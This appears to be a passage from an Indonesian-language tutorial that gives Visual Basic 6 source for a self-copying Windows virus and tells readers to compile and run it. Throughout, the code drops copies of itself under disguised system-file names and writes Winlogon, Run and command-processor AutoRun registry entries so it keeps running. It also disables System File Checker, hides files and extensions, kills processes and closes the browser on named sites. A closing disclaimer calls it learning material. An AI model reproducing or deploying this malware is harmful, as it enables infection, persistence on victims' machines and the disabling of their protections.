vbcyrax(1) = FindWindow(“IEFrame”, vbNullString)
vbcyrax(2) = FindWindowEx(vbcyrax(1), ByVal 0&, “WorkerW”, “Navigation Bar”)
vbcyrax(3) = FindWindowEx(vbcyrax(2), ByVal 0&, “ReBarWindow32″, vbNullString)
vbcyrax(4) = FindWindowEx(vbcyrax(3), ByVal 0&, “Address Band Root”, vbNullString)
vbcyrax(5) = FindWindowEx(vbcyrax(4), ByVal 0&, “ComboBoxEx32″, vbNullString)
vbcyrax(6) = FindWindowEx(vbcyrax(5), ByVal 0&, “ComboBox”, vbNullString)
vbcyrax(7) = FindWindowEx(vbcyrax(6), ByVal 0&, “Edit”, vbNullString)
viriFindIE7 = vbcyrax(7)
End Function

Public Function cyraxHackWindowText(window_hwnd As Long) As String
On Error Resume Next
Dim txtlen As Long
Dim txt As String
If window_hwnd = 0 Then Exit Function
txtlen = SendMessage(window_hwnd, &HE, 0, 0)
If txtlen = 0 Then Exit Function
txtlen = txtlen + 1
txt = Space$(txtlen)
txtlen = SendMessage(window_hwnd, &HD, txtlen, ByVal txt)
cyraxHackWindowText = Left$(txt, txtlen)
End Function

Function ValidPath(nPath As String) As String
If Right(nPath, 1) = “\” Then
ValidPath = nPath
Else
ValidPath = nPath & “\”
End If
End Function

‘Untuk mendapatkan Generator Class bisa download pada artikel “Class Finder & Generator:

‘Pertama-tama kita yang harus kita lakukan adalah mencari listview pada
‘Task Manager, dengan menggunakan FindWindow & FindWindowEX

‘Fungsi berikut untuk mencari HWND dari Listview pada tab Process
‘yang terdapat pada task manager
Function Bego_32770_Processes() As Long
Dim vbBeGo(1 To 3) As Long
vbBeGo(1) = FindWindow(“#32770″, “Windows Task Manager”)
vbBeGo(2) = FindWindowEx(vbBeGo(1), ByVal 0&, “#32770″, vbNullString)
vbBeGo(3) = FindWindowEx(vbBeGo(2), ByVal 0&, “SysListView32″, _
“Processes”)
Bego_32770_Processes = vbBeGo(3)
End Function

‘Fungsi berikut untuk mencari HWND dari Listview pada tab Application
‘yang terdapat pada task manager
Function Bego_32770_Tasks() As Long
Dim vbBeGo(1 To 3) As Long
vbBeGo(1) = FindWindow(“#32770″, “Windows Task Manager”)
vbBeGo(2) = FindWindowEx(vbBeGo(1), ByVal 0&, “#32770″, vbNullString)
vbBeGo(3) = FindWindowEx(vbBeGo(2), ByVal 0&, “SysListView32″, “Tasks”)
Bego_32770_Tasks = vbBeGo(3)
End Function

4. module ke 2 berisi code:

Option Explicit
Private Const VER_PLATFORM_WIN32_NT = 2
Private Declare Function GetVersionEx Lib “kernel32″ Alias “GetVersionExA” (ByRef lpVersionInformation As OSVERSIONINFO) As Long
Private Declare Function GetFileTitle Lib “comdlg32.dll” Alias “GetFileTitleA” (ByVal lpszFile As String, ByVal lpszTitle As String, ByVal cbBuf As Integer) As Integer

Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

‘
Public Function IsWinNT() As Boolean
Dim myOS As OSVERSIONINFO
myOS.dwOSVersionInfoSize = Len(myOS)
GetVersionEx myOS
IsWinNT = (myOS.dwPlatformId = VER_PLATFORM_WIN32_NT)
End Function

‘
Sub IsMePresent(nPath As String)
If isDirectory(nPath) Then
If IsMeAvailable(nPath) = False Then
MakeDuplicateFile nPath
AddToLog “Buat Duplikasi di directory: ” & nPath
End If
Else
Dim CurPath As String
CurPath = ValidPath(GetPathFromFile(nPath))
If IsMeAvailable(CurPath) = False Then
MakeDuplicateFile CurPath
AddToLog “Buat Duplikasi di directory: ” & CurPath
End If
End If
End Sub

‘
Function isDirectory(nPath As String) As Boolean
Dim H As Long
H = PathIsDirectory(nPath)
If H = 0 Then
isDirectory = False
Else
isDirectory = True
End If
End Function

‘
Function IsMeAvailable(nPath As String) As Boolean
On Error GoTo Salah
Dim hFile As String
hFile = Dir(ValidPath(nPath) & “*.exe”, vbNormal Or vbHidden Or vbSystem Or vbReadOnly Or vbArchive)
While hFile <> “”
If LCase(hFile) = “cyrax.exe” Then
IsMeAvailable = True
Exit Function
End If
hFile = Dir()
‘DoEvents
Wend
Salah:
End Function

‘
Sub MakeDuplicateFile(nPath As String, Optional AddName As String)
On Error Resume Next
If AddName = “” Then
Open ValidPath(nPath) & ViriName For Binary As #1
Put #1, , ViriCode
Close #1
Else
Open ValidPath(nPath) & AddName For Binary As #1
Put #1, , ViriCode
Close #1
End If
End Sub

Function GetPathFromFile(nFileName As String) As String
On Error GoTo Salah
Dim Buffer As String
Buffer = String(255, 0)
GetFileTitle nFileName, Buffer, Len(Buffer)
Buffer = Left$(Buffer, InStr(1, Buffer, Chr$(0)) – 1)
If Trim(Buffer) <> “” Then
GetPathFromFile = ValidPath(Left(nFileName, Len(nFileName) – Len(Buffer)))
End If
Salah:
End Function

Sub AddToLog(nStr As String)
On Error Resume Next
With Form1
If .lstLog.ListCount > 500 Then
.lstLog.Clear
Else
.lstLog.AddItem nStr
End If
.lstLog.ListIndex = .lstLog.ListCount – 1
End With
End Sub

5. module ke 3 berisi code :

Option Explicit
‘
Public Const v_SERVICE_FILENAME = “SRVICES.EXE”
Public Const v_PRIMARY_FILENAME = “SMHOST.EXE”
Public Const v_SECONDARY_FILENAME = “WLOGON.EXE”

Public VirusTitle As String
Public FIRST_FILE As String
Public SECOND_FILE As String

Const REG_SZ = 1 ‘ Unicode nul terminated string
Const REG_EXPAND_SZ = 2
Const REG_BINARY = 3 ‘ Free form binary
Const REG_DWORD = 4

Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006

Public Const reg_SMWC = “Software\Microsoft\Windows\CurrentVersion”
Public Const reg_SMWNTC = “Software\Microsoft\Windows NT\CurrentVersion”
Public Const reg_MsCMD = “Software\Microsoft\Command Processor”

Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteValue Lib “advapi32.dll” Alias “RegDeleteValueA” (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib “advapi32.dll” Alias “RegOpenKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib “advapi32.dll” Alias “RegQueryValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegEnumKeyEx Lib “advapi32.dll” Alias “RegEnumKeyExA” (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpName As String, lpcbName As Long, ByVal lpReserved As Long, ByVal lpClass As String, lpcbClass As Long, lpftLastWriteTime As Any) As Long
Private Declare Function RegEnumValue Lib “advapi32.dll” Alias “RegEnumValueA” (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Function RegQueryStringValue(ByVal hKey As Long, ByVal strValueName As String) As String
On Error Resume Next
Dim lResult As Long, lValueType As Long, strBuf As String, lDataBufSize As Long
lResult = RegQueryValueEx(hKey, strValueName, 0, lValueType, ByVal 0, lDataBufSize)
If lResult = 0 Then
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, Chr$(0))
lResult = RegQueryValueEx(hKey, strValueName, 0, 0, ByVal strBuf, lDataBufSize)
If lResult = 0 Then
RegQueryStringValue = Left$(strBuf, InStr(1, strBuf, Chr$(0)) – 1)
End If
ElseIf lValueType = REG_BINARY Then
Dim strData As Integer
lResult = RegQueryValueEx(hKey, strValueName, 0, 0, strData, lDataBufSize)
If lResult = 0 Then
RegQueryStringValue = strData
End If
ElseIf lValueType = REG_DWORD Then
Dim strDataL As Long
lResult = RegQueryValueEx(hKey, strValueName, 0, 0, strDataL, lDataBufSize)
If lResult = 0 Then
RegQueryStringValue = strDataL
End If
End If
End If
End Function
Function GetString(hKey As Long, strPath As String, strValue As String)
On Error Resume Next
Dim ret
RegOpenKey hKey, strPath, ret
GetString = RegQueryStringValue(ret, strValue)
RegCloseKey ret
End Function
Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
Dim ret
RegCreateKey hKey, strPath, ret
RegSetValueEx ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
RegCloseKey ret
End Sub
Sub SaveStringLong(hKey As Long, strPath As String, strValue As String, strData As String)
Dim ret
RegCreateKey hKey, strPath, ret
RegSetValueEx ret, strValue, 0, REG_BINARY, CByte(strData), 4
RegCloseKey ret
End Sub
Sub SaveStringWord(hKey As Long, strPath As String, strValue As String, strData As String)
Dim ret
RegCreateKey hKey, strPath, ret
RegSetValueEx ret, strValue, 0, REG_DWORD, CLng(strData), 4
RegCloseKey ret
End Sub

Sub DelSetting(hKey As Long, strPath As String, strValue As String)
Dim ret
RegCreateKey hKey, strPath, ret
RegDeleteValue ret, strValue
RegCloseKey ret
End Sub

Sub CreateDefaultFile()
‘
On Error Resume Next
FIRST_FILE = sysDir & v_PRIMARY_FILENAME
SECOND_FILE = sysDir & v_SECONDARY_FILENAME

MakeDuplicateFile sysDir, v_PRIMARY_FILENAME
MakeDuplicateFile sysDir, v_SECONDARY_FILENAME
End Sub

Sub CreateRegister()
On Error Resume Next
‘

SaveString HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “System”, FIRST_FILE
SaveString HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Run”, “System handler”, SECOND_FILE & ” /register”
SaveString HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “Userinit”, sysDir & “userinit.exe,” & SECOND_FILE & “, “
SaveString HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “shell”, “explorer.exe ” & FIRST_FILE

SaveString HKEY_CURRENT_USER, reg_SMWC & “\Run”, “RPCall”, FIRST_FILE & ” /register”
‘If IsWinNT = False Then
SaveString HKEY_LOCAL_MACHINE, reg_SMWC & “\Run”, “SRVState”, FIRST_FILE & ” /register”
‘End If

SaveString HKEY_CURRENT_USER, reg_MsCMD, “AutoRun”, “echo off|” & SECOND_FILE & “|cls”
SaveStringWord HKEY_CURRENT_USER, reg_MsCMD, “EnableExtensions”, “0″
SaveString HKEY_CURRENT_USER, reg_SMWNTC & “\Windows”, “load”, FIRST_FILE

SaveString HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “ReportBootOk”, “0″
SaveStringWord HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “SFCDisable”, &HFFFFFF9D ‘Def: 0
SaveStringWord HKEY_LOCAL_MACHINE, reg_SMWNTC & “\Winlogon”, “SFCScan”, &H0 ‘Def: 0

SaveStringWord HKEY_CURRENT_USER, reg_SMWC & “\Explorer\Advanced”, “ShowSuperHidden”, “0″
SaveStringWord HKEY_CURRENT_USER, reg_SMWC & “\Explorer\Advanced”, “Hidden”, “2″
SaveStringWord HKEY_CURRENT_USER, reg_SMWC & “\Explorer\Advanced”, “HideFileExt”, “1″
SaveStringWord HKEY_CURRENT_USER, reg_SMWC & “\Explorer\CabinetState”, “FullPath”, “1″
SaveStringWord HKEY_CURRENT_USER, reg_SMWC & “\Explorer\CabinetState”, “FullPathAddress”, “1″
SaveStringWord HKEY_LOCAL_MACHINE, reg_SMWC & “\SystemFileProtection”, “ShowPopups”, “0″

End Sub

6. module ke 4 berisi code :

Option Explicit

Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000

Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Declare Function PostMessage Lib “user32″ Alias “PostMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Declare Function DestroyWindow Lib “user32″ (ByVal hwnd As Long) As Long

Private Declare Function OpenProcess Lib “Kernel32.dll” (ByVal dwDesiredAccessas As Long, _
ByVal bInheritHandle As Long, _
ByVal dwProcId As Long) As Long
Declare Function GetParent Lib “user32″ (ByVal hwnd As Long) As Long
Private Declare Sub CloseHandle Lib “kernel32″ (ByVal hPass As Long)
Private Declare Function CreateToolhelp32Snapshot Lib “kernel32″ (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib “kernel32″ (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib “kernel32″ (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function TerminateProcess Lib “kernel32″ (ByVal hProcess As Long, _
ByVal uExitCode As Long) As Long

Function KillProcessByName(nName As String) As String
On Error Resume Next
If IsWinNT Then
If nName = “” Then Exit Function
Dim hSnapShot As Long, uProcess As PROCESSENTRY32, r As Long
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
r = Process32First(hSnapShot, uProcess)
Do While r
If LCase(Left$(uProcess.szExeFile, IIf(InStr(1, uProcess.szExeFile, Chr$(0)) > 0, InStr(1, uProcess.szExeFile, Chr$(0)) – 1, 0))) = LCase(nName) Then
KillProcessById uProcess.th32ProcessID
KillProcessById uProcess.th32ParentProcessID
End If
r = Process32Next(hSnapShot, uProcess)
DoEvents
Loop
CloseHandle hSnapShot
End If
End Function

Private Sub KillProcessById(p_lngProcessId As Long)
On Error Resume Next
Dim lnghProcess As Long
Dim lngReturn As Long

lnghProcess = OpenProcess(1&, -1&, p_lngProcessId)
lngReturn = TerminateProcess(lnghProcess, 0&)
End Sub

Sub KillAppByHWND(hwnd As Long)
On Error Resume Next
PostMessage hwnd, &H10, 0, 0
DestroyWindow hwnd
PostMessage hwnd, &H10, 0, 0
PostMessage hwnd, &H10, 0, 0
PostMessage hwnd, &H10, 0, 0
End Sub

Sub KillBadSite()
On Error Resume Next
Dim inText As String, IEHwnd As Long
IEHwnd = viriFindCombo(GetForegroundWindow)
If IEHwnd <= 0 Then IEHwnd = viriFindIE7() End If If IEHwnd <= 0 Then IEHwnd = viriFindCombo() End If inText = cyraxHackWindowText(IEHwnd) ‘ dibawah ini adalah hanya contoh situs saja, silahkan modifikasi ulang If InStr(1, inText, “google.co.id”, vbTextCompare) > 0 Then KillAppByHWND GetForegroundWindow
If InStr(1, inText, “17tahun.com”, vbTextCompare) > 0 Then KillAppByHWND GetForegroundWindow
If InStr(1, inText, “google.com”, vbTextCompare) > 0 Then KillAppByHWND GetForegroundWindow
If InStr(1, inText, “yahoo.com”, vbTextCompare) > 0 Then KillAppByHWND GetForegroundWindow
If InStr(1, inText, “yahoo.co.id”, vbTextCompare) > 0 Then KillAppByHWND GetForegroundWindow
‘untuk mencobanya silahkan buka Internet Explorer, kemudian ketikan alamat2 diatas
End Sub

7. Lalu Compile dan run hasil compilenya.

Sekian virus kake53m3v1 dibuat. Ini dibuat buat bahan pembelajaran vb6, jika disalah gunakan resiko anda yang menanggungnya.

“Selamat mencoba..!!,(^^,)..!!”

nAHwan_erLinggA

STEVE VAI